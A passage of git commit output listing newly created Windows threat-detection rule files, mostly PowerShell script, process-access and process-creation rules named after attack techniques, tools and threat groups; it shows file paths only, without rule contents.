bin/main/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_keylogging.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_localuser.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_psattack.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_remove_item_path.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_security_software_discovery.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_store_file_in_alternate_data_stream.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_extracting.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_get_adcomputer.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_get_adgroup.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_gettypefromclsid.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_gwmi.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_iofilestream.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_local_group_reco.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_mail_acces.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_networkcredential.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_new_psdrive.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_recon_export.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_wallpaper.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_windowstyle.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_susp_zip_compress.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_tamper_defender.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_timestomp.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_trigger_profiles.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_upload.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_web_request.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_win32_product_install_msi.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_wmimplant.yml create mode 100644 bin/main/rules/windows/powershell/powershell_script/posh_ps_xml_iex.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_cmstp_execution_by_access.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_handlekatz_lsass_access.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_in_memory_assembly_execution.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_invoke_phantom.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_lazagne_cred_dump_lsass_access.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_littlecorporal_generated_maldoc.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_load_undocumented_autoelevated_com_interface.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_lsass_memdump.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_lsass_werfault.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_malware_verclsid_shellcode.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_mimikatz_trough_winrm.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_pypykatz_cred_dump_lsass_access.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_svchost_cred_dump.yml create mode 100644 bin/main/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml create mode 100644 bin/main/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml create mode 100644 bin/main/rules/windows/process_access/process_access_win_susp_seclogon.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_7zip_cve_2022_29072.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_abusing_debug_privilege.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_abusing_windows_telemetry_for_persistence.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_accesschk_usage_after_priv_escalation.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_ad_find_discovery.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_advanced_ip_scanner.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_advanced_port_scanner.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_alternate_data_streams.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_always_install_elevated_windows_installer.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_anydesk.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_anydesk_silent_install.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_anydesk_susp_folder.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_actinium_persistence.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_apt29_thinktanks.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_babyshark.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_bear_activity_gtr19.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_bluemashroom.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_chafer_mar18.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_dragonfly.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_elise.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_emissarypanda_sep19.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_empiremonkey.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_gallium.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_gallium_sha1.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_gamaredon_ultravnc.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_judgement_panda_gtr19.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_ke3chang_regadd.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_apr21.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_lazarus_session_highjack.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_muddywater_dnstunnel.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_slingshot.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_sofacy.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_sourgrum.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_ta17_293a_ps.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_ta505_dropper.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_taidoor.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_tropictrooper.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_turla_commands_critical.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_turla_commands_medium.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_turla_comrat_may20.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_unc2452_cmds.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_unidentified_nov_18.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_winnti_mal_hk_jan20.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_wocao.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_apt_zxshell.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_arbitrary_shell_execution_via_settingcontent.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_asr_bypass_via_appvlp_re.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_attrib_hiding_files.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_attrib_system.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_automated_collection.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_base64_invoke_susp_cmdlets.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_base64_listing_shadowcopy.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_base64_reflective_assembly_load.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_bootconf_mod.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_bypass_squiblytwo.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_c3_load_by_rundll32.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_certoc_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_change_default_file_assoc_susp.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_change_default_file_association.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_chrome_load_extension.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_cleanwipe.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_clip.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_cmd_delete.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_cmd_redirect.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_cmd.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_modules.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_commandline_path_traversal.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_conti_cmd_ransomware.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_conti_sqlcmd.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_control_panel_item.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_crackmapexec_patterns.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_creation_mavinject_dll.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_creative_cloud_node_abuse.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_credential_access_via_password_filter.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_crime_fireball.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_crime_maze_ransomware.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_crime_snatch_ransomware.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_crypto_mining_monero.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_curl_download.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_cve_2021_26857_msexchange.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_data_compressed_with_rar.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_delete_systemstatebackup.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_detecting_fake_instances_of_hxtsr.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_dinjector.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_discover_private_keys.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_dns_serverlevelplugindll.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_dnscat2_powershell_implementation.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_dotnet.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_dsim_remove.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_dumpstack_log_evasion.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_embed_exe_lnk.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_encoded_frombase64string.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_encoded_iex.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_in_registry.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_etw_modification_cmdline.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_evil_winrm.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_0261.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1378.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1048.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_exploit_systemnightmare.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_false_sysinternalsuite.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_gotoopener.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_grabbing_sensitive_hives_via_reg.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_hack_adcspwn.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_hack_dumpert.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_hack_hydra.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_hack_koadic.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_hack_krbrelay.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_hack_krbrelayup.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_hack_secutyxploded.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_hack_wce.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_hashcat.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_headless_browser_file_download.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_hh_chm.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_hiding_malware_in_fonts_folder.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_high_integrity_sdclt.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_html_help_spawn.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_iis_http_logging.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_impacket_compiled_tools.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_impacket_lateralization.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_indirect_cmd.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_infdefaultinstall.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_install_reg_debugger_backdoor.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_interactive_at.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_clip.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_stdin.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_var.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_compress.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_rundll.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_stdin.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_clip.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_mhsta.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_var.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_jlaive_batch_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lethalhta.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_local_system_owner_account_discovery.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_logmein.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_aspnet_compiler.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_certoc_download.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_cl_loadassembly.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_cl_mutexverifiers.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_cscript_gathernetworkinfo.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_offlinescannershell.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml create mode 100644 